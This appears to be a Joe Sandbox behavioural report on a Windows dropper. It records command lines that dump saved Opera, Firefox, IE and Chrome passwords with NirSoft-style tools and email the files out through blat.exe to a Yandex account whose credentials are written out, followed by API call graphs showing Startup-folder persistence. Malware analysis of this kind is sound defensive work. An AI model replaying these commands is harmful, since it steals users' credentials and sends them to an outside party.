                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe
                                      Wow64 process (32bit):true
                                      Commandline:OperaPassView.exe /stext user-PC_OperaPassView.txt
                                      Imagebase:0x400000
                                      File size:40'448 bytes
                                      MD5 hash:8B4AE559AD7836B27EE9F8F171BE8139
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 61%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:12:15:00
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:12:15:03
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe
                                      Wow64 process (32bit):true
                                      Commandline:PasswordFox.exe /stext user-PC_PasswordFox.txt
                                      Imagebase:0x400000
                                      File size:39'424 bytes
                                      MD5 hash:CC84065F23CFC3D980AAD38EFC648DE6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FoxPasswordStealer, Description: Yara detected Fox Password Stealer, Source: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 76%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:12:15:03
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:12:15:05
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe
                                      Wow64 process (32bit):true
                                      Commandline:iepv.exe /stext user-PC_iepv.txt
                                      Imagebase:0x400000
                                      File size:44'544 bytes
                                      MD5 hash:C861FE184E271D6E2BA958DA306BA748
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:12:15:05
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:12:15:07
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe
                                      Wow64 process (32bit):true
                                      Commandline:ChromePass.exe /stext user-PC_ChromePass.txt
                                      Imagebase:0x400000
                                      File size:130'048 bytes
                                      MD5 hash:CB271441FA19AC163ECF380C8EBB3109
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 61%, ReversingLabs
                                      Has exited:true

                                      Target ID:16
                                      Start time:12:15:07
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 120 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:12:16:08
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 8%, ReversingLabs
                                      Has exited:true

                                      Target ID:21
                                      Start time:12:16:08
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:12:16:10
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"
                                      Imagebase:0x7ff70f330000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:12:16:16
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:12:16:18
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:12:16:24
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:12:16:27
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "user-PC_iepv.txt" -body "ie"
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:12:16:34
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:12:16:36
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:12:16:42
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:66%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:60%
                                        Total number of Nodes:75
                                        Total number of Limit Nodes:14

                                        Callgraph

                                        Control-flow Graph

                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 004014DC
                                        • PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 004014E6
                                        • GetWindowsDirectoryA.KERNEL32(00404450,00001000), ref: 004014F6
                                        • PathAddBackslashA.SHLWAPI(00404450,00404450,00001000), ref: 00401500
                                        • GetTempPathA.KERNEL32(00001000,00405450), ref: 00401510
                                        • PathAddBackslashA.SHLWAPI(00405450,00001000,00405450), ref: 0040151A
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 0040152C
                                        • PathFindFileNameA.SHLWAPI(C:\Users\user\Desktop\,00000000,C:\Users\user\Desktop\,00000200), ref: 00401536
                                        • GetEnvironmentVariableA.KERNEL32(APPDATA,00407450,00001000), ref: 0040154E
                                        • PathAddBackslashA.SHLWAPI(00407450,APPDATA,00407450,00001000), ref: 00401558
                                        • SHGetSpecialFolderPathA.SHELL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\,00000007,00000001), ref: 00401569
                                        • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\), ref: 00401574
                                        • SHGetSpecialFolderPathA.SHELL32(00000000,00409450,00000010,00000001), ref: 00401585
                                        • PathAddBackslashA.SHLWAPI(00409450), ref: 00401590
                                          • Part of subcall function 00401189: FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401199
                                          • Part of subcall function 00401189: ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                          • Part of subcall function 00401A6F: MessageBoxA.USER32(00000000,004015A5), ref: 00401A8C
                                        • FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 004015B4
                                        • SizeofResource.KERNEL32(00000000,00000000,00000000,00000001,0000000A,00000001), ref: 004015CA
                                        • ExitProcess.KERNEL32(?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000,00406450,00410060), ref: 004019FF
                                        • ExitProcess.KERNEL32(00000000,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000,00406450,00410060), ref: 00401A06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: Path$Backslash$ExitFindProcessResource$DirectoryFileFolderNameSpecial$EnvironmentMessageModuleSizeofSystemTempVariableWindows
                                        • String ID: 4UB$APPDATA$C:\Dir1\SubDir$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$C:\Users\user\Desktop\$C:\Windows\system32\$open
                                        • API String ID: 1375885263-934362696
                                        • Opcode ID: 50095d240ff997be04fd6f2d848ced9c49322861209034e3b8e4f945b30697c9
                                        • Instruction ID: e2ab4b508eaebd8f5c656a5e621ccd2c6fa043b933859f919f4585061545147a
                                        • Opcode Fuzzy Hash: 50095d240ff997be04fd6f2d848ced9c49322861209034e3b8e4f945b30697c9
                                        • Instruction Fuzzy Hash: AED13074A84204AEEB11ABA0DD86FAD3775AB54719F20403BF101B61F1D7FD6890DB1D

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNEL32(Shell32.dll,0040111C), ref: 00401345
                                        • GetProcAddress.KERNEL32(ShellExecuteA,Shell32.dll), ref: 0040135A
                                        • GetProcAddress.KERNEL32(SHGetSpecialFolderPathA,0040111C), ref: 0040136F
                                        • LoadLibraryA.KERNEL32(shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 0040137E
                                        • GetProcAddress.KERNEL32(PathFindFileNameA,shlwapi.dll), ref: 00401393
                                        • GetProcAddress.KERNEL32(PathAddBackslashA,PathFindFileNameA), ref: 004013A8
                                        • LoadLibraryA.KERNEL32(advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 004013B7
                                        • GetProcAddress.KERNEL32(RegCreateKeyExA,advapi32.dll), ref: 004013CC
                                        • GetProcAddress.KERNEL32(RegSetValueExA,RegCreateKeyExA), ref: 004013E1
                                        • GetProcAddress.KERNEL32(RegCloseKey,RegSetValueExA), ref: 004013F6
                                        • LoadLibraryA.KERNEL32(ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401405
                                        • GetProcAddress.KERNEL32(RtlDecompressBuffer,ntdll.dll), ref: 0040141A
                                        • GetModuleFileNameA.KERNEL32(00000000,0040B450,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401430
                                        • GetEnvironmentVariableA.KERNEL32(ComSpec,0040F450,00000500,00000000,0040B450,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA), ref: 00401444
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad$EnvironmentFileModuleNameVariable
                                        • String ID: ComSpec$PathAddBackslashA$PathFindFileNameA$RegCloseKey$RegCreateKeyExA$RegSetValueExA$RtlDecompressBuffer$SHGetSpecialFolderPathA$Shell32.dll$ShellExecuteA$advapi32.dll$ntdll.dll$shlwapi.dll
                                        • API String ID: 3647900824-1083084054
                                        • Opcode ID: 6ef7ec11d9fb8a3ad29c85a516843b12afa07f7b7a4480054501895f0df25c09
                                        • Instruction ID: 1a3f60b94c72a3d764b465012e8e4006d7b5de4556887a89fcf71d3449609cad
                                        • Opcode Fuzzy Hash: 6ef7ec11d9fb8a3ad29c85a516843b12afa07f7b7a4480054501895f0df25c09
                                        • Instruction Fuzzy Hash: 55118FB0786344ADE611BF22AC03AA53E75E790B05B10C43BB444755FAE7FD59B19B0C

                                        Control-flow Graph

                                        APIs
                                        • GetCommandLineA.KERNEL32 ref: 00401AD8
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401AE4
                                        • GetProcessHeap.KERNEL32(00000000), ref: 00401AEE
                                          • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                          • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                          • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                          • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                          • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                          • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                          • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                          • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                          • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                        • String ID:
                                        • API String ID: 673778540-0
                                        • Opcode ID: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
                                        • Instruction ID: 8dce49216dd7d9d4199a49ca56cfbc69a4ccef7545e9a5bd4d655d6bb2b69eda
                                        • Opcode Fuzzy Hash: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
                                        • Instruction Fuzzy Hash: 50E06774A45300AAE7217F71AE02B193E75A74174AF00007BB601791F6EBB86A109B5D

                                        Control-flow Graph

                                        APIs
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: 714ab66ee6a437a4e7e531f558f1893001c0bd575ffc3dde3890ca7ea888f759
                                        • Instruction ID: 6052738ef485299c3c4fdb0b236ee7e135dca6718f0a2ea55ee82b8d7645fc1e
                                        • Opcode Fuzzy Hash: 714ab66ee6a437a4e7e531f558f1893001c0bd575ffc3dde3890ca7ea888f759
                                        • Instruction Fuzzy Hash: 22C02B3420C304CBD216DB84C745B003330FB00F02F400077A200259F2837C7800D94F

                                        Control-flow Graph

                                        APIs
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: b3c74884984f365968fc207d099f3b1e189d9239c5d3ccd66837152c84ea0862
                                        • Instruction ID: 5b4a1a1b9248d86d75d5b6903a42a4fd48aa6b016996c6b0739733c6a8f7b2a9
                                        • Opcode Fuzzy Hash: b3c74884984f365968fc207d099f3b1e189d9239c5d3ccd66837152c84ea0862
                                        • Instruction Fuzzy Hash: CDC02B3810C380CAD31BC364864AB017271A700F02F8480B3E201244F2437C6D40C20F

                                        Control-flow Graph

                                        APIs
                                        • FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401199
                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 004011AF
                                        • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: Resource$ExitFindProcessSizeof
                                        • String ID: 4UB
                                        • API String ID: 1411291463-2201820659
                                        • Opcode ID: 2951c3ceb8ed4102f800c93b197117d063b6b0fade13dfe354e7c0c7c61d492e
                                        • Instruction ID: 54916fd416a240242440a09587848b99c6951bb24d46c27558f3872607dfc3e1
                                        • Opcode Fuzzy Hash: 2951c3ceb8ed4102f800c93b197117d063b6b0fade13dfe354e7c0c7c61d492e
                                        • Instruction Fuzzy Hash: 1A4101B0A40204EFEB40DFA5ED81BA93BB4F754345F10857AF501BA2B1E7B46DA0DB19

                                        Control-flow Graph

                                        APIs
                                        • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                        • RegisterClassExA.USER32(00000030), ref: 0040106E
                                        • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                        • ShowWindow.USER32(00000001,?), ref: 004010BC
                                        • UpdateWindow.USER32(00000001), ref: 004010C7
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                        • TranslateMessage.USER32(?), ref: 004010E4
                                        • DispatchMessageA.USER32(?), ref: 004010ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                        • String ID: 0$WinClass32
                                        • API String ID: 282685165-2329282442
                                        • Opcode ID: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
                                        • Instruction ID: 47d6b7d35728adeecb0fde599aadb8774aba34f0bad3284053c57367e6fa7a97
                                        • Opcode Fuzzy Hash: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
                                        • Instruction Fuzzy Hash: 7D210C70D41249AAEF10EFD0CC46BDDBFB8AB04708F20802AF200BA1E5D7B96655DB5C

                                        Control-flow Graph

                                        control_flow_graph 103 4010fb-401108 104 401111-401115 103->104 105 40110a call 4014cb 103->105 107 401117-40112d call 401340 SendMessageA 104->107 108 40112f-401133 104->108 109 40110f 105->109 111 401142-401154 DefWindowProcA 107->111 108->111 112 401135-40113f PostQuitMessage 108->112 109->111
                                        APIs
                                        • SendMessageA.USER32(?,00009D99,00000000,00000000), ref: 00401128
                                        • DefWindowProcA.USER32(?,00000002,?,?), ref: 0040114E
                                          • Part of subcall function 004014CB: GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 004014DC
                                          • Part of subcall function 004014CB: PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 004014E6
                                          • Part of subcall function 004014CB: GetWindowsDirectoryA.KERNEL32(00404450,00001000), ref: 004014F6
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00404450,00404450,00001000), ref: 00401500
                                          • Part of subcall function 004014CB: GetTempPathA.KERNEL32(00001000,00405450), ref: 00401510
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00405450,00001000,00405450), ref: 0040151A
                                          • Part of subcall function 004014CB: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 0040152C
                                          • Part of subcall function 004014CB: PathFindFileNameA.SHLWAPI(C:\Users\user\Desktop\,00000000,C:\Users\user\Desktop\,00000200), ref: 00401536
                                          • Part of subcall function 004014CB: GetEnvironmentVariableA.KERNEL32(APPDATA,00407450,00001000), ref: 0040154E
                                          • Part of subcall function 004014CB: PathAddBackslashA.SHLWAPI(00407450,APPDATA,00407450,00001000), ref: 00401558
                                          • Part of subcall function 004014CB: SHGetSpecialFolderPathA.SHELL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\,00000007,00000001), ref: 00401569
